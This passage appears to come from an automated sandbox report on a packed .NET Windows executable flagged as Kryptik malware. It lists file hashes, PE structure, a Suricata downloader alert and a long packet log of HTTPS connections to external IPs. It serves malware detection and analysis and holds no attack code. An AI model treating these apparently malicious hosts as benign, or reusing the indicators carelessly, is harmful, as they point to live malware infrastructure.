PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.657062782743586
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
File size:	1'067'008 bytes
MD5:	d8af2fcab18bcb456063134e43294027
SHA1:	ba314352f6f942833719370dce1a9787a5a73d56
SHA256:	1f505dfeee1da7c057e8d747a9d0de93e10d31907e7b8f533e090ef62f70785e
SHA512:	48bcb15b96cae8aae5c6689547a2499166e6f2eba175cc73f30923d5943226bb9d5127779870cd61a8f040c8e962e0b307af2adbd5e3f3ecc8dbe06a7ebb6810
SSDEEP:	12288:Ht07cgZaVq3bxVfWw/qTfScYp6wbZssG/NDA/3FBl0LyNhTJPsRhObcsQwcT:Ht0gmBxVfWwI260asG/lAdBSObm
TLSH:	2B35CFFEC7196E99D13E1370004730B8D3F2D2E5E4A2D729D9D4B2E2A733AC4656126B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c<w@.................@..........._... ...`....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x505fce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x40773C63 [Sat Apr 10 00:14:27 2004 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
adc byte ptr [eax], al
add byte ptr [eax], al
sbb byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax+60h], bl
adc byte ptr [eax], al
mov word ptr [ebx], es
add byte ptr [eax], al
in al, 04h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov word ptr [ebx], es
xor al, 00h
add byte ptr [eax], al
push esi
add byte ptr [ebx+00h], dl
pop edi
add byte ptr [esi+00h], dl
inc ebp
add byte ptr [edx+00h], dl
push ebx
add byte ptr [ecx+00h], cl
dec edi
add byte ptr [esi+00h], cl
pop edi
add byte ptr [ecx+00h], cl
dec esi
add byte ptr [esi+00h], al
dec edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+00FEEF04h], bh
add byte ptr [ecx], al
add byte ptr [ebx], cl
add byte ptr [edi], al
add byte ptr [edx], dl
add byte ptr [esi], cl
add byte ptr [ebx], cl
add byte ptr [edi], al
add byte ptr [edx], dl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x105f7c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x106000	0x3e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x108000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x103fd4	0x104000	0369a6e9b4ba0776950f189a3cfefd81	False	0.8247511643629808	data	7.662456866055934	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x106000	0x3e4	0x400	7f8bf3e4057a9e7cdb4378723a1f1209	False	0.4228515625	data	3.426765074024361	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x108000	0xc	0x200	c9aa57b61771e5b508d68674bdf4ea19	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x106058	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data			0.44162995594713655

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-11T11:22:25.627292+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49725	443	192.168.2.7	172.67.19.24

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2024 11:21:43.076865911 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.076896906 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.076982975 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.086401939 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.086420059 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.568902016 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.569067001 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.573852062 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.573860884 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.574249029 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.622422934 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.653119087 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.696508884 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.759923935 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.760034084 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.760108948 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.760122061 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.760138988 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.760216951 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.760226965 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.760359049 CEST	443	49709	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:43.760410070 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.772320032 CEST	49709	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:43.951997995 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:43.952055931 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:43.952137947 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:43.952573061 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:43.952600956 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.704622984 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.704905033 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.706655025 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.706670046 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.707040071 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.709141970 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.752507925 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.835589886 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.835803986 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.835841894 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.835881948 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.835882902 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.835958004 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.835985899 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.836308002 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.836374998 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.836391926 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.836570978 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.836592913 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.836657047 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.836673021 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.836724997 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.840534925 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.888183117 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:44.888248920 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:44.935059071 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:45.181296110 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:45.181442022 CEST	443	49710	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:45.181715012 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:45.182305098 CEST	49710	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:49.061449051 CEST	49711	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:49.061481953 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.061583042 CEST	49711	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:49.062136889 CEST	49711	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:49.062159061 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.532495022 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.534786940 CEST	49711	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:49.534801006 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.675741911 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.675803900 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.675843000 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.675882101 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.675925016 CEST	49711	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:49.675947905 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.675981045 CEST	49711	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:49.676009893 CEST	443	49711	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:49.676095963 CEST	49711	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:49.676706076 CEST	49711	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:49.759650946 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:49.759691954 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:49.759787083 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:49.760061979 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:49.760076046 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.239176035 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.241111040 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.241132975 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.365988970 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366064072 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366110086 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366142988 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366178036 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.366183996 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366194963 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366225958 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.366300106 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.366772890 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366842031 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366889954 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.366894960 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366905928 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.366993904 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.370737076 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.419280052 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.419296026 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.457617998 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.457720041 CEST	443	49712	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:50.457739115 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.457787037 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:50.458388090 CEST	49712	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:54.777101994 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:54.777132034 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:54.777237892 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:54.777559996 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:54.777570009 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.334332943 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.334444046 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.336980104 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.336986065 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.337198973 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.338960886 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.380546093 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.472425938 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.472579956 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.472609043 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.472620010 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.472640038 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.472681046 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.472687960 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.473113060 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.473148108 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.473165989 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.473176003 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.473217010 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.473637104 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.473705053 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.473747015 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.473752975 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.528703928 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.528718948 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.559928894 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.559982061 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.559990883 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.560010910 CEST	443	49713	172.67.188.178	192.168.2.7
Aug 11, 2024 11:21:55.560056925 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.560549021 CEST	49713	443	192.168.2.7	172.67.188.178
Aug 11, 2024 11:21:55.670819998 CEST	49714	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:55.670871973 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:55.671005011 CEST	49714	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:55.671283960 CEST	49714	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:55.671303034 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:56.144862890 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:56.147398949 CEST	49714	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:56.147469044 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:56.267453909 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:56.267481089 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:56.267508984 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:56.267528057 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:56.267608881 CEST	443	49714	172.67.19.24	192.168.2.7
Aug 11, 2024 11:21:56.267704010 CEST	49714	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:56.267704010 CEST	49714	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:56.267704010 CEST	49714	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:56.268338919 CEST	49714	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:21:56.340073109 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.340106964 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.340174913 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.340480089 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.340502977 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.822643042 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.824513912 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.824529886 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.956163883 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.956217051 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.956238031 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.956257105 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.956273079 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.956306934 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.956417084 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.956417084 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.956417084 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.956434965 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.957113028 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.957138062 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.957189083 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.957205057 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:56.957361937 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:56.963203907 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:57.013418913 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:57.013433933 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:57.046441078 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:57.046505928 CEST	443	49715	188.114.97.3	192.168.2.7
Aug 11, 2024 11:21:57.046551943 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:57.046551943 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:21:57.046943903 CEST	49715	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:01.451996088 CEST	49717	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:01.452039003 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:01.452125072 CEST	49717	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:01.452394009 CEST	49717	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:01.452409983 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:01.919853926 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:01.921943903 CEST	49717	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:01.921968937 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:02.067224026 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:02.067356110 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:02.067424059 CEST	49717	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:02.067450047 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:02.067533970 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:02.067595005 CEST	49717	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:02.067609072 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:02.067734003 CEST	443	49717	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:02.067799091 CEST	49717	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:02.068430901 CEST	49717	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:02.099744081 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.099780083 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.099962950 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.100277901 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.100301981 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.585360050 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.587580919 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.587599993 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711378098 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711500883 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711545944 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711590052 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711632967 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711663008 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711700916 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711705923 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.711705923 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.711718082 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711736917 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.711757898 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711793900 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.711795092 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711810112 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.711874962 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.801965952 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.802160978 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.802284002 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.802295923 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.802376986 CEST	443	49718	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:02.802434921 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:02.802853107 CEST	49718	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:07.217277050 CEST	49719	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:07.217339039 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.217467070 CEST	49719	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:07.217761040 CEST	49719	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:07.217782974 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.681438923 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.683393002 CEST	49719	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:07.683423042 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.826210022 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.826250076 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.826276064 CEST	443	49719	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:07.826297045 CEST	49719	443	192.168.2.7	172.67.19.24
